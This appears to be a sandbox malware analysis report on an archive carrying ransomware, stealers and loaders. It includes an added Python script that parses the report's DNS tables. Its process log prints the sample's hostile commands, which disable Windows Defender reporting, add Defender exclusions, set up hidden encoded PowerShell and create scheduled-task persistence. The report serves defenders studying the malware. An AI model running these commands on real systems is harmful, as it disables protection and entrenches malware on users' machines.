Malware Analysis Report

2024-11-13 18:57

Sample ID: 240223-vmbzvseg4s
Target: file_release_4.rar
SHA256: e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5
Tags: djvu risepro smokeloader stealc zgrat pub3 backdoor discovery evasion ransomware rat spyware stealer themida trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral3, behavioral4, behavioral5, behavioral6, behavioral1, behavioral2 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 10/10
SHA256: e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5
Threat Level: Known bad

The file file_release_4.rar was found to be: Known bad.

Malicious Activity Summary

djvu risepro smokeloader stealc zgrat pub3 backdoor discovery evasion ransomware rat spyware stealer themida trojan

ZGRat

RisePro

Detected Djvu ransomware

Djvu Ransomware

Stealc

Detect ZGRat V1

SmokeLoader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Themida packer

Modifies file permissions

Checks BIOS information in registry

Checks computer location settings

Reads user/profile data of web browsers

Unexpected DNS network traffic destination

Checks whether UAC is enabled

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Unsigned PE

Program crash

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-02-23 17:06

Signatures

Unsigned PE

5 hits, no indicator, process or target details recorded.

Analysis: behavioral3

Detonation Overview

Submitted: 2024-02-23 17:05
Reported: 2024-02-23 17:10
Platform: win10v2004-20240221-en
Max time kernel: 147s
Max time network: 155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A | 2

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 1.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 175.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 200.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 186.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted: 2024-02-23 17:05
Reported: 2024-02-23 17:10
Platform: win10v2004-20240221-en
Max time kernel: 143s
Max time network: 156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Count
PID 4764 wrote to memory of 1892 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe | 3

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 204.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted: 2024-02-23 17:05
Reported: 2024-02-23 17:10
Platform: win10v2004-20240221-en
Max time kernel: 126s
Max time network: 158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Count
PID 2116 wrote to memory of 4272 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe | 3

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4272 -ip 4272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4272 -s 588

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 196.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 210.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 200.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted: 2024-02-23 17:05
Reported: 2024-02-23 17:09
Platform: win10v2004-20240221-en
Max time kernel: 33s
Max time network: 143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Detect ZGRat V1

3 hits, no indicator, process or target details recorded.

Detected Djvu ransomware

5 hits, no indicator, process or target details recorded.

Djvu Ransomware (tags: ransomware, djvu)

RisePro (tags: stealer, risepro)

SmokeLoader (tags: trojan, backdoor, smokeloader)

Stealc (tags: stealer, stealc)

ZGRat (tags: rat, zgrat)

Identifies VirtualBox via ACPI registry values (likely anti-VM) (tags: evasion)

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A

Modifies file permissions (tags: discovery)

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A

Reads user/profile data of web browsers (tags: spyware, stealer)

Themida packer (tags: themida)

3 hits, no indicator, process or target details recorded.

Unexpected DNS network traffic destination

Description | Indicator | Process | Target | Count
Destination IP | 193.233.132.49 | N/A | N/A | 6
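The Network tables in the behavioral3, behavioral4 and behavioral5 runs above are almost entirely reverse (PTR) lookups sent to 8.8.8.8, and the signature just above reports DNS sent to 193.233.132.49 instead. The Python below is an added example, not part of the sandbox output: it converts the in-addr.arpa names back into the IPs they describe, ties those PTR lookups to connections in the same table (a PTR for an address the guest just connected to is the OS resolving its own peer, not something the sample asked for), and lists every DNS destination that is not the expected resolver. The first five rows of ROWS are copied from the behavioral3 table; the last row is constructed to stand in for the 193.233.132.49 destination, for which the report prints no Network row, so its country and queried name are unknown and marked N/A.

```python
"""Per-host view of the Network tables in this report.

Added example, not part of the sandbox output. Most rows are reverse (PTR)
lookups whose in-addr.arpa labels are an IP written backwards; converting
them back and matching them to connections in the same table separates the
guest resolving hosts it just talked to from lookups with no matching
connection, and flags DNS sent anywhere other than the expected resolver
(the condition behind the "Unexpected DNS network traffic destination"
signature).
"""
import ipaddress
from collections import Counter

# First five rows copied from the behavioral3 Network table; the last row is
# constructed for the DNS destination the signature reports, which has no
# Network row in the report (country and queried name unknown).
ROWS = """\
US 8.8.8.8:53 1.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
N/A 193.233.132.49:53 N/A udp
"""

def ptr_to_ip(name):
    """'200.197.79.204.in-addr.arpa' -> '204.79.197.200'; None unless it is an IPv4 PTR name."""
    suffix = '.in-addr.arpa'
    if not name.lower().endswith(suffix):
        return None
    octets = name[:-len(suffix)].split('.')
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address('.'.join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None

def parse_rows(text):
    """Rows of 'Country Destination Domain Proto' into dicts, splitting Destination into ip and port."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(':')
        rows.append({'country': country, 'ip': ip, 'port': int(port), 'domain': domain, 'proto': proto})
    return rows

def summarize(rows, resolvers=('8.8.8.8',)):
    """Group DNS rows by what they asked for and tie PTR lookups back to the table's connections."""
    dns = [r for r in rows if r['port'] == 53]
    connections = [r for r in rows if r['port'] != 53]
    connected_ips = {r['ip'] for r in connections}
    reverse, forward = Counter(), Counter()
    for r in dns:
        ip = ptr_to_ip(r['domain'])
        if ip:
            reverse[ip] += 1
        elif r['domain'] != 'N/A':
            forward[r['domain']] += 1
    return {
        'connections': [(r['ip'], r['port'], r['proto'], r['domain']) for r in connections],
        'forward_lookups': dict(forward),
        'reverse_lookups': dict(reverse),
        'ptr_for_connected_ip': sorted(ip for ip in reverse if ip in connected_ips),
        'ptr_without_connection': sorted(ip for ip in reverse if ip not in connected_ips),
        'unexpected_dns': sorted({r['ip'] for r in dns if r['ip'] not in resolvers}),
    }

if __name__ == '__main__':
    for key, value in summarize(parse_rows(ROWS)).items():
        print(key, value)
```

On the rows above the PTR for 204.79.197.200 pairs with the TCP connection to g.bing.com at that address, while the other PTR targets have no connection in the table; whether those belong to the guest's own background traffic or to the sample is a question for the pcap, and the script only makes the split visible.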

Checks whether UAC is enabled (tags: evasion, trojan)

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target | Count
N/A | iplogger.org | N/A | N/A | 3

Looks up external IP address via web service

Description | Indicator | Process | Target | Count
N/A | ipinfo.io | N/A | N/A | 11
N/A | api.myip.com | N/A | N/A | 3
N/A | api.2ip.ua | N/A | N/A | 2

AutoIT Executable

1 hit, no indicator, process or target details recorded.

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A | 2

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\Documents\GuardFox\oPAY0atGsFrz5J6mweTZuaDf.exe

"C:\Users\Admin\Documents\GuardFox\oPAY0atGsFrz5J6mweTZuaDf.exe"

C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe

"C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe"

C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe

"C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe"

C:\Users\Admin\Documents\GuardFox\fVLq49qtba3ytPK4Nw9io13j.exe

"C:\Users\Admin\Documents\GuardFox\fVLq49qtba3ytPK4Nw9io13j.exe"

C:\Users\Admin\Documents\GuardFox\Mi6AWN9vXRBRMcYeS_3_zVDQ.exe

"C:\Users\Admin\Documents\GuardFox\Mi6AWN9vXRBRMcYeS_3_zVDQ.exe"

C:\Users\Admin\Documents\GuardFox\pPrCgUdP2JClGnpyLmHJPscG.exe

"C:\Users\Admin\Documents\GuardFox\pPrCgUdP2JClGnpyLmHJPscG.exe"

C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe

"C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe"

C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe

"C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5752 -ip 5752

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

"C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe"

C:\Users\Admin\Documents\GuardFox\Je5Umq1MWJcqIN0348bnKOfX.exe

"C:\Users\Admin\Documents\GuardFox\Je5Umq1MWJcqIN0348bnKOfX.exe"

C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe

"C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCBD.tmp\Install.exe

.\Install.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\22158657-fbde-415a-bad4-5bee4646aa0b" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\7zS23CF.tmp\Install.exe

.\Install.exe /MFFdidt "525403" /S

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -s

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -i

C:\Users\Admin\AppData\Local\Temp\onefile_3900_133531816951741958\WW9_64.exe

"C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe"

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

"C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe"

C:\Users\Admin\Documents\GuardFox\6mW5b4qOjpVvTGG_x07s4stc.exe

"C:\Users\Admin\Documents\GuardFox\6mW5b4qOjpVvTGG_x07s4stc.exe"

C:\Users\Admin\Documents\GuardFox\QoPxz2PXYbxFkd1ZtaGIY5nB.exe

"C:\Users\Admin\Documents\GuardFox\QoPxz2PXYbxFkd1ZtaGIY5nB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 344

C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe

"C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe"

C:\Users\Admin\Documents\GuardFox\Odt0imGpkgnE0De9TQmDwGiD.exe

"C:\Users\Admin\Documents\GuardFox\Odt0imGpkgnE0De9TQmDwGiD.exe"

C:\Users\Admin\AppData\Local\Temp\is-VM79T.tmp\eQYk_b6jz16mJKmMtyzJXk5e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VM79T.tmp\eQYk_b6jz16mJKmMtyzJXk5e.tmp" /SL5="$20272,4460890,54272,C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe"

C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe

"C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe"

C:\Users\Admin\Documents\GuardFox\gA119GY6BxzJ20qiar2SBob6.exe

"C:\Users\Admin\Documents\GuardFox\gA119GY6BxzJ20qiar2SBob6.exe"

C:\Users\Admin\Documents\GuardFox\tICD3_G5dCLsOTlSefOYkF5v.exe

"C:\Users\Admin\Documents\GuardFox\tICD3_G5dCLsOTlSefOYkF5v.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc74599758,0x7ffc74599768,0x7ffc74599778

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

"C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

"C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2132 -ip 2132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 568

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2176 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:8

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3008 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:2

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4124 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6116 -ip 6116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5736 -ip 5736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 2244

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 2368

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gloyEKczR" /SC once /ST 10:59:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gloyEKczR"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\2g1j7SGm0vjI4nkHAuJW.exe

"C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\2g1j7SGm0vjI4nkHAuJW.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

